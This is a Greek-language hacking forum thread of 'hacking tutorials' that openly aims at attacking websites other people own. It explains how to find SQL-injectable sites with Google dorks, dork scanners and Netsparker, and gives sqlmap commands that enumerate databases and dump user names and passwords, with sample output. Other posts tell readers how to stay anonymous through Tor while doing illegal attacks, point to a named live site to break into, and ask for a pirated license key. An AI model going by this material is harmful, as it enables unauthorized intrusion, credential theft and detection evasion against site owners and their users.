~Grey Hat~

Ακομα δεν ανοιξε το section και αρχισαμε να κατακρινουμε! Το guide ειναι 101% δικο μου.! οι photos ειναι απο το google! Δεν βρισκω κατι κακο σε αυτο!

Σε ευχαριστω ! Θα ανεβασω το βραδακι και αλλα!

Εισαγωγη Γεια σας για ακομη μια φορα..Σε αυτο το τοπικ θα σας παρουσιασω ενα προγραμμα με το οποιο μπορεις να βρεις τα ευπαθη σημεια σε μια σελιδα , δηλαδη το προγραμμα θα σου δειξει ακριβως το σημειο απο το οποιο μπορεις να εισβαλεις στην σελιδα και να κανεις SQL injection! Mε λιγα λογια σου δινει το url της σελιδας που ειναι ευπαθες! Το προγραμμα αυτο λεγεται NetsParker και το link παρακατω ειναι για λογισμικο Windows οποιοδηποτε και αν εχετε...(Για τον τροπο με τον οποιο βρισκουμε ευπαθη σημεια σε μια σελιδα με λογισμικο Linux εχω αναφερει σε αλλο τοπικ) Downloads Λοιπον για να το κατεβασετε πατατε Εδω Ξεκιναμε Αφου το κατεβασουμε ,το ανοιγουμε και βλεπουμε αυτο Το σημειο που ειναι κυκλομενο με το μαυρο μαρκαδορο θα γραψετε την σελιδα που επιθυμειτε να scannarete !Και οταν τελειωσει το scan θα σας εμφανισει κατι τετοιο Κατω στα Issues θα σας βγαλει σημεια τα οποια πιθανον ειναι ευπαθη!Κατω αριστερα που γραφει Vulverability Chart θα δειτε απο τα Issues που βρηκατε ποια ειναι τα πιο ευαλωτα και καταλληλα να επιτεθειτε..Συνηθως τα ευαλωτα ειναι κοκκινοι φακελοι δηλαδη Ιmportant !Και οι φακελοι που ειναι κοκκινοι με ενα θαυμαστικο εχουν βρει κατα 95% ευπαθες σημειο!Αφου επιλεξετε τι φακελο θελετε ,πατε στο Vulverable Url , το κανετε αντιγραφη και ειστε ετοιμοι! Για SQL Injection δειτε τα αλλα μου ποστ! Ευχαριστω

Ως επι το πλειστον αναφερετε σε ατομα που θελουν να κανουν επιθεσεις στον ιστο χωρις να γινοντε αντιληπτοι και χωρις να μπορουν να τους εντοπισουν! Σιγουρα αν παιζεις μονο παιχνιδια και δεν ασχολεισαι με τετοια σου ειναι λιγο/πολυ αχρηστο!

Ειναι απο τα καλυτερα προγραμματα που υπαρχουν και φυσικα δωρεαν!

Eισαγωγη Γεια σας και παλι !Αυτη τη φορα θα κανω ενα ποστ για το πως μπορειτε να σερφαρετε ανωνυμα στο ιντερνετ με ψευτικα στοιχεια! Γιατι χρειαζομαι κατι τετοιο ? Νομιζω πως η απαντηση ειναι αρκετα απλη ! Εαν ασχολειστε με το χακινγκ και γενικα δεν θελετε να σας εντοπισει κανενας σε περιπτωση που κανετε κατι κακο/παρανομο δεν εχετε παρα να ακολουθησετε τον παρακατω οδηγο! Ας αρχισουμε Αρχικα θα φτιαξω εναν οδηγο για windows και μετα για Linux! WINDOWS: To προγραμμα το οποιο θα χρειαστουμε λεγεται Tor! Θα το κατεβασετε απο εδω Torproject Yπενθυμιζω πως αυτο ειναι για windows !Αφου το κατεβασουμε τρεχουμε κανονικα το εικονιδιο .exe! κανει το extract μονο του και οταν τελειωσει σας ανοιγει αυτο Αυτο σημαινει πως το προγραμμα συνδεετε στο δικτυο..Οταν συνδεθει θα σας ανοιξει τον browser του τορ , οπου απο εκει σερφαρετε με ψευτικη ip!Για να τεσταρετε οτι εχετε αλλη ip και ειστε προστατευμενοι πατηστε Εδω Συγχαρητηρια τωρα σερφαρετε ανωνυμα ! LINUX:Εδω τα πραγματα ειναι τελειως διαφορετικα.Δεν εχουμε να κανουμε με τοσο χειροπιαστα πραγματα! Εδω ολα εκτελουντε με εντολες! οποτε:Ανοιγουμε ενα τερματικο και γραφουμε lsb_release -c και μας εμφανιζει τι διανομη linux εχουμε πχ lucid πηγαινουμε και ανοιγουμε με gedit το αρχειο /etc/apt/sources.list και προσθετουμε κατω αυτη την γραμμη deb http ://deb.torproject.org/torproject.org <DISTRIBUTION> main Eκει που γραφω DISTRIBUTION εσεις θα βαλετε την διανομη που εχετε..!]πχ. deb http://deb/torproject.org/torproject.org lucid main Tο αποθηκευουμε και το κλεινουμε..Γραφουμε στο τερματικο μετα gpg --keyserver keys.gnupg.net --recv 886DDD89 Μας εμφανιζει αυτο gpg: Total number processed: 1 gpg: unchanged: 1 Μετα γραφουμε gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add- Μας εμφανιζει ΟΚ..Μετα απο αυτο γραφουμε apt-get update και περιμενουμε να τελειωσει το Update..Αφου τελειωσει γραφουμε αυτο apt-get install tor tor-geoipdb Και αφου εχουμε εγκαταστησει το Tor χωρις κανενα προβλημα παταμε Εδω για να εγκαταστησουμε ενα tool στον Firefox browser μας! Eπιτρεπουμε να κανουμε εγκατασταση το torbutton και μετα κανουμε ενα restart του firefox και θα δουμε ενα κρεμμυδι αριστερα πανω!Παταμε πανω του και επιλεγουμε Toggle Tor status.Οταν αυτο γινει πρασινο παταμε Εδω για να κοιταξουμε αν εχουμε ρυθμισει σωστα το Tor.Επισης μπορειτε να το τσεκαρετε και στην προηγουμενη σελιδα που ειχα αναφερει στα windows xp Εδω Aυτο ηταν!Πλεον σερφαρετε ανωνυμα και με Linux! Μερικες συμβουλες: Οταν κανετε επιθεση στο διαδικτυο σε οποιαδηποτε σελιδα , ποτε να μην εχετε ανοιχτα προσωπικα δεδομενα, δηλαδη (facebook,yahoo,twitter ktlp...) διοτι ετσι μπορει να σας εντοπισουν..Να θυμαστε οτι κανενας δεν ειναι 100% ανωνυμος στο ιντερνετ! Ευχαριστω!

κριμα! πολυ κριμα θα μπορουσαμε να φτιαξουμε κατι καλο

gelaei kalutera opoios

i also get sql error syntax in the page..so i am sure that is vulverable

Hello bobi..Please help me out.. i found a site with vulveralbility with my netsparker program..but i can't get keyword and db .. why is that ? check the site and tell me... http://l2int.eu/index.php?id=acp&action=login

Κανω για να ανεβουν λιγο τα ποστ και να επισκεπτοντε περισσοτεροι το section..

Οκ

I have a good tutorial for downloa backtrack in hacking section! i have also guides for sql injection in greek language!

bump

bump

Thanks men

Psomas Could you find a license key for VMware Workstation ? Thank you my friend!

What fuck re paides? giati den asxoleite kanenas me to hack section ..proothiste to ligo

Ευχαριστω φιλος..Να σαι καλα!

Is it just copy -paste or i am wrong ? http://www.hackforums.net/archive/index.php/thread-1472638.html

χαχα ωραιος ο συνονοματος! Μην αγχωνεσαι οτι δεν ειναι δικο μου θα βαζω τα credits!Οσο για το οτι δεν κανουμε hack και τετοια οντως αυτο ελεγαν αλλα καποιος ας κανει την αρχη!

Εισαγωγη Καλησπερα σας! Σε αυτο το ποστ θα σας αναλυσω τι ειναι το Backtrack ποιες οι δυνατοτητες και αργοτερα θα κανω ενα ποστ με τους τροπους τους οποιους μπορειτε να το τρεξετε χωρις να χρειαστει να ξηλωσετε το ηδη υπαρχον λειτουργικο συστημα που εχετε! Τι ειναι το BackTrack ? Ας αρχισουμε : Tι ειναι το Backtrack? : Το BACKTRACK είναι μία διανομή Linux η οποία διανέμεται σε Live CD και προήλθε από τη συγχώνευση του Whax και του Auditor Security Collection τα οποία χρησιμοποιούνταν κυρίως για penetration testing. Το BackTrack απευθύνεται κυρίως στα άτομα που θέλουν να δοκιμάσουν την ασφάλεια ενός συστήματος η σε ατομα που εχουν κακους σκοπους :P xD. Η διανομή του σε Live CD και Live USB δίνει την άμεση δυνατότητα εκκίνησης του BackTrack χωρίς να χρειάζεται εγκατάσταση. Παραδειγματα Εργαλειων Ας δουμε 2-3 εργαλεια απο τα 130 που εχει το backtrack! 1-Sqlmap: το sqlmap ειναι το εργαλειο με το οποιο μπορεις να κανεις sql injection σε μια σελιδα και να κλεψεις πληροφοριες κωδικους οπως στους οδηγους που εχω γραψει για αυτο το θεμα! 2-Aircrack : Το aircrack ειναι προγραμμα για να σπατε κωδικους wifi δηλαδη ασυρματα δικτυα! 3-Δυνατοτητα Ddos attack με το ettercap και πολλους αλλους τροπους! Νομιζω πως πλεον εχω πεισει ολους οσους θελουν να γινουν χακερ! χεχε! Ας μην πολυλογουμε ομως και ας δωσω καποια λινκ για download! Downloads Επιλεξτε την version που σας ταιριαζει και ελατε παλι εδω για να δουμε πως θα το τρεξετε χωρις εγκατασταση και χωρις πολυ κοπο! ~~>Βacktrack ... Τροπος Τρεξιματος Ας δουμε τωρα πως θα το τρεξουμε: 1η περιπτωση:Έχουμε Windows ή Linux (ή όποιο άλλο λειτουργικό έχουμε ήδη εγκατεστημένο), αλλά δεν θέλουμε να το "χαλάσουμε". Όταν ο υπολογιστής μας έχει μπόλικη μνήμη και όταν λέμε μπόλικη εννοούμε τουλάχιστο 2 GB ή 1 GB το απόλυτα ελάχιστο σε μερικές περιπτώσεις, όπως επίσης εξωτερική κάρτα usb (όταν θέλουμε να κάνουμε δοκιμές διείσδυσης σε ασύρματα δίκτυα) τότε μπορούμε να τρέξουμε το backtrack σε μια λεγόμενη εικονική μηχανή. Βρήκα για σας έναν αξιόλογο οδηγό εδω ~~>VMware Tutorial ως παράδειγμα για το πως μπορείτε να δημιουργήσετε μια εικονική μηχανή με Windows XP, εσείς απλά στην επιλογή λειτουργικού θα επιλέξετε Ubuntu - Linux. Ως εικόνα δίσκου επιλέξτε το backtrack iso που κατεβάσαμε από το παραπάνω link και μέσα από το μενού μπορούμε να επιλέξουμε προαιρετικά την εγκατάσταση στον εικονικό δίσκο που φτιάξαμε αρχικά. λινκ για το VMware ~~>VMwareDownload 2η περιπτωση (συνιστω!): Δεν έχουμε εξωτερική κάρτα, ούτε "μπόλικη μνήμη", αλλά επίσης μας αρέσει να το τρέξουμε "native" για λόγους ευκολίας και χρησιμοποίησης πιο εξειδικευμένων χαρακτηριστικών όπως πχ. ταχύτητα στο σπάσιμο. Κατεβάζουμε λοιπόν το iso του backtrack από το παραπάνω link και το μεταφέρουμε σε usb με το unetbootin.(To unetbootin ειναι πολυ ευκολο στην χρηση του δεν χρειαζεται καποιον οδηγο πιστευω, παρ'ολα αυτα μπορειτε να τσεκαρετε στο youtube αν εχετε αποριες UnetBootin Με αυτόν τον τρόπο έχουμε το πλεονέκτημα ότι αν ενεργοποιήσουμε το persistence αποθηκεύουμε και τις αλλαγές. Σε περίπτωση που έχουμε κάνει ήδη την εγκατάσταση στο usb αλλά ξεχάσαμε να βάλουμε persistence τότε ακολουθούμε αυτόν τον οδηγό και στο syslinux.cfg βάζουμε την εντολή persistent (μετά τις παύλες σε κάθε APPEND γραμμή, πχ. APPEND initrd=/casper/initrd.gz file=/cdrom/preseed/custom.seed boot=casper text splash vga=832 radeon.modeset=1 -- persistent Η παραπάνω εντολή dd όμως είναι μόνο για Linux. Σε αυτήν την περίπτωση τρέχουμε πρώτα το backtrack και μετα πληκτρολογούμε cd /cdrom σε γραμμή εντολών και ύστερα τα υπόλοιπα. Στην επόμενη επανεκκίνηση πρέπει να μπορούμε να αποθηκεύσουμε τις αλλαγές. Yπο-περιπτωση:Το iso μπορούμε να το μεταφέρουμε και σε δίσκο cd και μπορούμε να το τρέξουμε και από εκεί, ειδικά στην περίπτωση πολύ παλιού υπολογιστή που δεν μπορεί να κάνει εκκίνηση από usb. Όμως το να αποθηκεύσουμε τις αλλαγές σε αυτήν την περίπτωση είναι από δύσκολο έως και αδύνατο. Προαιρετικά και σε αυτήν την περίπτωση μπορούμε να το εγκαταστήσουμε και στον εσωτερικό δίσκο του υπολογιστή μας. Eυχαριστω! Για οτι αποριες εχετε στειλτε μου pm

Γεια σε ολους και καλως σας βρηκα!Ριξτε μια ματια ολοι στο section~~>Hacking Tutorials ανεβαζω πραγματα αρκετα συχνα!..Για οτιδηποτε ερωτησεις μου λετε!Εχω σκοπο να φτιαξουμε κατι καλο εκει!

Eiσαγωγη Καλησπερα σε ολα τα μελη και χαιρομαι που σας βρισκω μιας και ειναι το πρωτο μου ποστ στο section! Οπως γραφει και στον τιττλο σημερα θα σας δειξω πως κανω εγω sql injection σε μια ιστοσελιδα και υποκλεπτω αρχεια ,κωδικους κτλπ.! Tι θα χρειαστουμε? Για να γινει αυτο θα χρειαστουμε λειτουργικο συστημα BackTrack R1!Eιναι λειτουργικο συστημα των Linux!Μη φοβαστε δεν χρειαζεται να βγαλετε τα windows σας η οτι αλλο χρησημοποιειτε!Θα ανεβασω αργοτερα ενα guide για το πως θα το τρεξετε! Αρχικα πρεπει να βρουμε αν η σελιδα ειναι ευαλωτη σε επιθεσεις, για να το κανουμε αυτο θα χρειαστουμε καποιο προγραμμα! Παρακατω εχω 2 link με τετοια προγραμματα! Downloads Dork XCodeExploitScanner Πληροφοριες Συνεχιζω...εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες,μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google.. Ξεκινωντας Την Διαδικασια Λοιπον Ανοιγουμε ενα τερματικο στο backtrack και γραφουμε cd /pentest/database/sqlmap ,ωστε να ενεργοποιησουμε το sqlmap.Μετα γραφουμε ./sqlmap.py -u [ url ]--beep πχ ./sqlmap.py -u http://www.selidathyma.com --beep Οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα.Συνεχιζω εδω...μετα γραφουμε ./sqlmap.py -u [ url ] --dbs π.χ ./sqlmap.py -u http://www.selidathyma.com --dbs θα μας εμφανισει τα Database πχ available databases [6]: [*] dswa [*] dswa_stage [*] dswawordpress [*] information_schema [*] mysql [*] test ./sqlmap.py -u [ url ] --tables -D [database] μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι πχ ./sqlmap.py -u http://www.selidathyma.com --tables -D dswa Database: dswa [table] [tr] [td][104 tables] +-----------------------------------+ | access | accesslog | actions | actions_aid | advanced_help_index | authmap | autologout | batch | blocks | blocks_roles | boxes | cache | cache_block | cache_content | cache_filter | cache_form | cache_menu | cache_page | cache_update | cache_views | cache_views_data | comments | content_access | content_field_headername | content_group | content_group_fields | content_node_field | content_node_field_instance | content_type_education_center_sub | content_type_find_alliance | content_type_member_home_page | content_type_member_page | content_type_page | content_type_page_ns | content_type_story | dswa_chapters_main | dswa_chapters_persons | dswa_eventuity_additional | dswa_eventuity_link | dswa_eventuity_main | dswa_profile_additional | dswa_profile_geographic | dswa_profile_images | dswa_profile_main | dswa_store_categories | dswa_store_featured | dswa_store_featured_sample | dswa_store_images | dswa_store_product_categories | dswa_store_products | dswa_taq_articles | dswa_taq_quotes | dswa_taq_tips | dswa_taq_topics | dswa_teleclasses_additional | dswa_teleclasses_main | dswa_teleclasses_speakers | dswa_whatsnew_main | dswa_whatsnew_order | fckeditor_role | fckeditor_settings | files | filter_formats | filters | flood | history | menu_custom | menu_links | menu_router | node | node_access | node_comment_statistics | node_counter | node_revisions | node_type | performance_detail | performance_summary | permission | profile_fields | profile_values | role | search_dataset | search_index | search_node_links | search_total | semaphore | sessions | system | term_data | term_hierarchy | term_node | term_relation | term_synonym | upload | url_alias | users | users_roles | variable | views_display | views_object_cache | views_view | vocabulary | vocabulary_node_types | watchdog[/td] [/tr] [/table] ./sqlmap.py -u [ url ] --columns -T [table name] -D [databasename] Παραδειγμα ./sqlmap.py -u http://www.selidathyma.com --columns -T user -D dswa Και αρχιζει βγαζει τους users...Αλλο παραδειγμα.. ./sqlmap.py -u [ url ] --dump -C [column] -T [table name] -D [databasename] πχ ./sqlmap.py -u http://www.selidathyma.com --dump -C pass -T users -D dswa πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα <~~~ τσεκαρετε μια να δειτε. π.χ ./sqlmap.py -u http://www.selidathyma.com --dump -C name -T users -D dswa , και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα ~~~> Και ετσι μπορεις να υποκλεψεις στοιχεια απο διαφορες σελιδες..Τα παραπανω χρησημοποιηθηκαν σε δικο μου συστημα..Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα. Ερχονται καλυτερα ποστ !Ευχαριστω

Accound solded to DivineMercy..Please lock the topic